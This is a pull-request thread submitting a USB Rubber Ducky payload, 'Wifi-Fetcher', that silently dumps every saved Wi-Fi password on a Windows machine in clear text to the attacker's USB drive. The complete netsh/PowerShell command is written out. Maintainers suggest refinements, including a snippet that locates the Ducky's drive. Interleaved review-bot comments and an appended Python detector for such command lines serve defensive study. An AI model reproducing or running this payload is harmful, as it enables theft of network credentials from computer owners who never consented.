Wifi-Fetcher Payload #425

Open: wants to merge 9 commits into base: master

NightCoder-bit

A payload that will exfiltrate all the Wi-Fi information that has been saved on the computer and pull it to the D:\loot\PwnedWIFI\all_wifi_info.txt file on your USB Rubber Ducky. If the file is not in that directory, it will create it.

IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE.

Adding a payload to the Hak5 library
@NightCoder-bit
Author

After uploading the payload for approval I just now saw that the winner of the recent Payload-awards has a script that serves almost the same functionality as mine, only that mine has 0 dependencies for the target since I used integrated system components, and the output file is stored locally, which doesn't even require an internet connection. You also won't need a Dropbox token; if you create the directory on your Ducky, it's basically plug 'n' play. Just don't have too much fun ;)

Shortened Overall Runtime
obfuscation by making the cmd less readable
fixed error with Delays.
Removed the obfuscation because it was affecting the execution time too much.
also made the script run in only 22 seconds, which means we cut around 15 seconds from the initial script
@dallaswinger
Member

Your disclaimer regarding the required directory needs to go into the payload.txt, otherwise no one will ever see it after this is merged.

You should also use DEFINE for this so it is easily changeable.

@dallaswinger added the "pending requested changes" label (requires changes before merge) on Jan 2, 2024
Added DISCLAIMER and INSTRUCTIONS
used DEFINE in the Script for easy adaptability
Please don't publish it yet as I will have to test it beforehand. I will make some last changes in the next 24 hours, then it can be published to the repo
actually done for now
@NightCoder-bit
Author

It IS ready, you can go ahead and put it in the repo

REM credits:ChatGPT helped a little here and there while debugging
REM DEPENDENCIES: NONE
REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications)
DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused."
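
Review bot: the DEFINE DISC line stores a legal disclaimer in a constant that none of the lines shown here reference, so it reads as configuration while doing nothing; put the disclaimer in REM lines in the header instead. The TOTAL_EXEC_TIME line above it has typos ("based of taged specifications") and should state in plain words what the timing depends on; the commit messages in this PR quote 22 seconds while this line says 18.5, so confirm which figure is current.
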
Member

I would change this to be a REM rather than a DEFINE.

REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications)
DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused."
REM
DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE"
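
Review bot: DEFINE INSTR on the last line embeds the path D:\loot\PwnedWIFI\ inside a sentence, which is not the configurable value the earlier review asked for; nothing shown references INSTR, and anyone changing the output location still has to edit the path wherever it is typed. Move the instruction text to REM lines and keep a DEFINE only for the path itself.
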
Member

I would change this to be a REM rather than a DEFINE.

DELAY 220
STRINGLN color FE
DELAY 50
STRINGLN start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" & exit
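
Review bot: the STRINGLN start /MIN line writes a second file, all_wifi_passwords.txt, that neither the PR description nor the INSTR text mentions, and both files receive keys in clear text because of key=clear. Document both output files and what they contain in the REM header so that whoever handles the storage knows it holds credentials. The path D:\loot\PwnedWIFI\ is also typed twice on this line rather than taken from a DEFINE, which is the change the first review comment requested.
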
Member

A better approach for this is to use dynamic code that locates the Ducky's drive location. You can use PowerShell to locate the drive name DUCKY, which is the default drive name.

For example:

Get-Volume | Where-Object { $_.FileSystemLabel -eq 'DUCKY' } | Select-Object -ExpandProperty DriveLetter

This dynamically locates the drive letter for the Ducky. Keep in mind that not everyone will be using the default label of DUCKY; it is recommended that you add a DEFINE for the label: DEFINE #DUCKY_DRIVE_LABEL DUCKY. This allows the user to easily configure the payload for their specific configuration.

DEFINE #DUCKY_DRIVE_LABEL DUCKY
STRINGLN Get-Volume | Where-Object { $_.FileSystemLabel -eq '#DUCKY_DRIVE_LABEL' } | Select-Object -ExpandProperty DriveLetter

@@ -0,0 +1,28 @@
REM NAME: Wifi-Fetcher
Member

You have placed your payload in the wrong directory. Please ensure that your payloads are uploaded to the correct directory: payloads/library/exfiltration/Wifi-Fetcher/payload.txt
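
On the defensive side, the netsh command line quoted in this review is visible in process-creation telemetry. The following is an added example, not code from the pull request or the Hak5 repository: it flags command lines that request saved Wi-Fi profiles with key=clear and notes when the output goes to a non-system drive. The event records are constructed, and treating C: as the system drive is an assumption.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "powershell.exe", "CommandLine":
        r"powershell netsh wlan show profile name=HomeNet key=clear | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'"},
    {"Image": "netsh.exe", "CommandLine": "netsh  WLAN export profile KEY=clear"},
    {"Image": "cmd.exe", "CommandLine":
        r"cmd.exe /c n^etsh wl^an show profile name=Office key=cl^ear > C:\Users\Public\w.txt"},
    {"Image": "netsh.exe", "CommandLine": "netsh wlan show profiles"},
    {"Image": "netsh.exe", "CommandLine": "netsh wlan show interfaces"},
]

# "show" or "export" of a profile with key=clear inside one pipeline segment.
KEY_DUMP = re.compile(
    r"netsh(?:\.exe)?\s+wlan\s+(show|export)\s+profiles?\b[^|;&]*\bkey\s*=\s*clear")
# Drive letter of an Out-File target or a shell redirect.
OUT_PATH = re.compile(r"(?:out-file\b[^|;]*?|>)\s*([a-z]):\\")
SYSTEM_DRIVE = "c"  # assumption: any other letter is a secondary or removable volume


def normalise(cmdline):
    """Strip cmd carets, PowerShell backticks and quotes, collapse spaces, lower-case."""
    stripped = re.sub(r"[\^`\"']", "", cmdline)
    return re.sub(r"\s+", " ", stripped).lower()


def classify(cmdline):
    """Return the findings for one command line (empty list means nothing flagged)."""
    text = normalise(cmdline)
    findings = [f"wlan-{m.group(1)}-key-clear" for m in KEY_DUMP.finditer(text)]
    if findings:  # only report output targets for lines that already dump keys
        for m in OUT_PATH.finditer(text):
            if m.group(1) != SYSTEM_DRIVE:
                findings.append(f"output-to-drive-{m.group(1)}")
    return findings


def scan(events):
    """Return (event index, findings) for every event with at least one finding."""
    hits = [(i, classify(ev["CommandLine"])) for i, ev in enumerate(events)]
    return [(i, found) for i, found in hits if found]


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], found)
```

Listing profile names without key=clear is left unflagged, since that call returns no credentials.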
